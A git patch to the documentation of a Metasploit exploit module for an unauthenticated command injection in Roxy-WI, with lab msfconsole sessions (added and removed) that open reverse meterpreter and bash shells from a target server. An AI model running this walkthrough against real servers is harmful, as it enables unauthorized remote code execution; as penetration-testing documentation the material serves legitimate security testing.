From bdf8defe53dd6bf8d618bd85aee96bf6ea702039 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Nuri=20=C3=87ilengir?= <44322086+ncilengir@users.noreply.github.com> Date: Mon, 25 Jul 2022 16:03:09 +0000 Subject: [PATCH] Apply suggestions from code review --- .../exploit/linux/http/roxy_wi_exec.md | 70 +++++++------------ 1 file changed, 27 insertions(+), 43 deletions(-) diff --git a/documentation/modules/exploit/linux/http/roxy_wi_exec.md b/documentation/modules/exploit/linux/http/roxy_wi_exec.md index 5bdbb6ebe1..e9078aa47c 100644 --- a/documentation/modules/exploit/linux/http/roxy_wi_exec.md +++ b/documentation/modules/exploit/linux/http/roxy_wi_exec.md @@ -1,11 +1,8 @@ ## Vulnerable Application -### Description - This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. - ### Setup Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages. @@ -30,62 +27,49 @@ chown -R www-data:www-data haproxy-wi 9. Do: `run` 10. You should get a shell as the user running the Roxy-WI server. +## Targets + +### 0 + +This executes a Unix command. + +### 1 + +This uses a Linux dropper to execute code. + ## Options ### TARGETURI -The base path to Roxy-WI. The default value is `/` + +Set `TARGETURI` if the Roxy-WI is installed at a custom path. ## Scenarios +### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) + ``` -msf6 > use exploit/linux/http/roxy_wi_exec +Apache/2.4.52 +MySQL 8.0.29 +Python 3.10.4 +``` + +``` +msf6 > use exploit/linux/http/roxy_wi_exec [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116 RHOST => 192.168.56.116 -msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 -RPORT => 443 msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 +msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 +RPORT => 443 msf6 exploit(linux/http/roxy_wi_exec) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Checking if 192.168.56.116:443 is vulnerable! [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed. -[*] Generating payload. -[*] Trying to detect command injection vulnerability. -[*] Sending stage (40164 bytes) to 192.168.56.116 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300 -[+] Exploit successfully executed. +[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp +[*] Sending stage (40168 bytes) to 192.168.56.116 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300 -meterpreter > pwd -/var/www/haproxy-wi/app -``` - -You can also use cmd payloads. - -``` -msf6 > use exploit/linux/http/roxy_wi_exec -[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp -msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116 -RHOST => 192.168.56.116 -msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 -RPORT => 443 -msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1 -LHOST => 192.168.56.1 -msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash -payload => cmd/unix/reverse_bash -msf6 exploit(linux/http/roxy_wi_exec) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[*] Checking if 192.168.56.116:443 is vulnerable! -[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed. -[*] Generating payload. -[*] Trying to detect command injection vulnerability. -[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300 -[+] Exploit successfully executed. - -id -uid=33(www-data) gid=33(www-data) groups=33(www-data)``` +meterpreter > ```